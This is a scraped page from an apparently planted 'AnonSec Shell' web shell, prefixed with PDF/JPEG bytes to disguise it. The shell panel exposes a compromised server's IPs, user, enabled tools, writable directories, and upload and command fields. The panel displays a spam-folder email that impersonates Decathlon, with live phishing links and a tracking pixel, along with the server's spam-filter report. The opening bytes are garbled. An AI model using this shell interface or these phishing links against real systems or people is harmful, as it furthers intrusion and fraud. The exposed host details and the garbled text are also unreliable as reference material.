%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.217.36
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/mail/.spam/new/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/meir5web/mail/.spam/new/1756547403.M139844P1776325.server.tobedev.com,S=7530,W=7660
Return-Path: <ssved@toptemu.click>
Delivered-To: meir5web+spam@server.tobedev.com
Received: from server.tobedev.com
	by server.tobedev.com with LMTP
	id j8ZIBUvJsmjFGhsAkQZavg
	(envelope-from <ssved@toptemu.click>)
	for <meir5web+spam@server.tobedev.com>; Sat, 30 Aug 2025 09:50:03 +0000
Return-path: <ssved@toptemu.click>
Envelope-to: contact@meirpanim.fr
Delivery-date: Sat, 30 Aug 2025 09:50:03 +0000
Received: from toptemu.click ([185.176.220.173]:48029)
	by server.tobedev.com with esmtp (Exim 4.98.2)
	(envelope-from <ssved@toptemu.click>)
	id 1usIDh-00000007S4v-0HM4
	for contact@meirpanim.fr;
	Sat, 30 Aug 2025 09:50:02 +0000
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=smtp; d=toptemu.click;
 h=Date:Sender:Message-Id:To:From:Subject:Content-Type:Mime-Version:Content-Transfer-Encoding; i=contact-467654@toptemu.click;
 bh=3Iwkhl/aJhm5erR1bbP7YqYQYy0=;
 b=IU68f1SSf185EqmLQFjfjpsNnkNM1vQ6bDXKsCq5GxFxPGx1z6MGsnDBX++wG4gGyROmAbG2cfTP
   XoRgW7B2f6f7LK1cf8Ww/q7wI97qZ8TzdPpcTIPBzUStYO80Y6X3bA2Gxcj6CfA1Uz67+PfyqbC4
   HYBSfwKKPeDYhRnnXtk=
DomainKey-Signature: a=rsa-sha1; c=nofws; q=dns; s=smtp; d=toptemu.click;
 b=1ASWFHi68c6uqcbyltnT1zbtsEzmZt+8NyIZHWqNtDo0UzM1vPWCclCAKeKvq/ECXRQmeha/grB6
   l+ctsjsLJDzSOC7SZEn3kLK3axTUelKP9lXD1nQN8+2B0u5PRdF66OneZWo40D/o3SMCIfv0IENT
   g0IsreFYDnRkvlz2IFI=;
Date: Sat, 30 Aug 2025 09:49:19 +0000
Sender: contact-467654@toptemu.click
Message-Id: <857857235572888.9.JQL9032165195@toptemu.click>
To: contact@meirpanim.fr
From: Message de *Decathlon* <Decathlon@toptemu.click>
Content-Type: text/html; charset="UTF-8"
Mime-Version: 1.0
Content-Transfer-Encoding: 8bit
X-Spam-Status: Yes, score=35.6
X-Spam-Score: 356
X-Spam-Bar: +++++++++++++++++++++++++++++++++++
X-Spam-Report: Spam detection software, running on the system "server.tobedev.com",
 has identified this incoming email as possible spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  Click here to unsubscribe 
 Content analysis details:   (35.6 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
                              Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                           [185.176.220.173 listed in bl.score.senderscore.com]
  2.7 RCVD_IN_PSBL           RBL: Received via a relay in PSBL
                             [185.176.220.173 listed in psbl.surriel.com]
  4.7 RCVD_IN_XBL            RBL: Received via a relay in Spamhaus XBL
                             [185.176.220.173 listed in zen.spamhaus.org]
  3.6 RCVD_IN_PBL            RBL: Received via a relay in Spamhaus PBL
                             [185.176.220.173 listed in zen.spamhaus.org]
  0.1 URIBL_CSS_A            Contains URL's A record listed in the Spamhaus CSS
                             blocklist
                             [URI: toptemu.click/185.176.220.173]
                             [URI: mnfpeourb.gooostops.click/185.176.220.70]
  2.5 URIBL_DBL_PHISH        Contains a Phishing URL listed in the Spamhaus DBL
                             blocklist
                             [URI: toptemu.click]
  4.5 URIBL_DBL_SPAM         Contains a spam URL listed in the Spamhaus DBL
                             blocklist
                             [URI: gooostops.click]
                             [URI: mnfpeourb.gooostops.click]
  0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
                              Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [185.176.220.173 listed in sa-accredit.habeas.com]
  0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                        [185.176.220.173 listed in sa-trusted.bondedsender.org]
 -0.0 SPF_HELO_PASS          SPF: HELO matches SPF record
 -0.0 SPF_PASS               SPF: sender matches SPF record
 -0.1 DKIM_VALID_EF          Message has a valid DKIM or DK signature from
                             envelope-from domain
  0.1 DKIM_SIGNED            Message has a DKIM or DK signature, not necessarily valid
 -0.1 DKIM_VALID_AU          Message has a valid DKIM or DK signature from author's
                             domain
 -0.1 DKIM_VALID             Message has at least one valid DKIM or DK signature
  0.7 FROM_FMBLA_NEWDOM28    From domain was registered in last 14-28 days
  2.0 PDS_OTHER_BAD_TLD      Untrustworthy TLDs
                             [URI: mnfpeourb.gooostops.click]
                             [(click)]
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was blocked.
                             See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URI: gooostops.click]
                             [URI: toptemu.click]
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  1.0 HTML_IMAGE_ONLY_08     BODY: HTML: images with 400-800 bytes of words
  0.8 KAM_OTHER_BAD_TLD      Other untrustworthy TLDs
  0.1 HTML_SHORT_LINK_IMG_1  HTML is very short with a linked image
  0.6 HTML_MIME_NO_HTML_TAG  HTML-only message, but there is no HTML tag
  0.0 T_HTML_TAG_BALANCE_CENTER Malformatted HTML
  0.7 SHORT_IMG_SUSP_NTLD    Short HTML + image + suspicious TLD
  0.5 FROM_SUSPICIOUS_NTLD   From abused NTLD
  3.0 DKIMWL_BL              DKIMwl.org - Blocked sender
  0.0 T_STY_INVIS_DIRECT     HTML hidden text + direct-to-MX
  1.9 URIBL_ABUSE_SURBL      Contains an URL listed in the ABUSE SURBL blocklist
                             [URI: mnfpeourb.gooostops.click]
                             [URI: toptemu.click]
                             [URI: gooostops.click]
  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
             [Blocked - see <https://www.spamcop.net/bl.shtml?185.176.220.173>]
  1.7 RAZOR2_CHECK           Listed in Razor2 (http://razor.sf.net/)
  2.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
                             [cf: 100]
  0.8 KAM_IMAGEONLY          Email from a questionable TLD that contains primarily
                             just an image
X-Spam-Flag: YES
Subject:  ***SPAM***  Nous avons une surprise de *Décathlon*

<center>
<a href="http://gooostops.click/index.php?search=4&d213377&vmpsc=611-10&lm=467654XMYA420&sd=9&page=pKgr5JP55OQuKuo"><img src="http://gooostops.click/img/W0yh0cKP20yLsW4J"></a>
  <center>
    <a href="http://mnfpeourb.gooostops.click/index.php?search=6&d213377&seuxb=611-10&lm=467654NYWV420&sd=9&page=kWcOp81g7SLryzL">Click here to unsubscribe</a>
    <img src="http://gooostops.click/track/index.php?search=3&d213377&bzraw=611-10&lm=467654PBSP420&sd=9&page=fuJMvKcTqf2vRqm" style="display:none;" alt="tracking pixel"/>
  </center>




Anon7 - 2022
AnonSec Team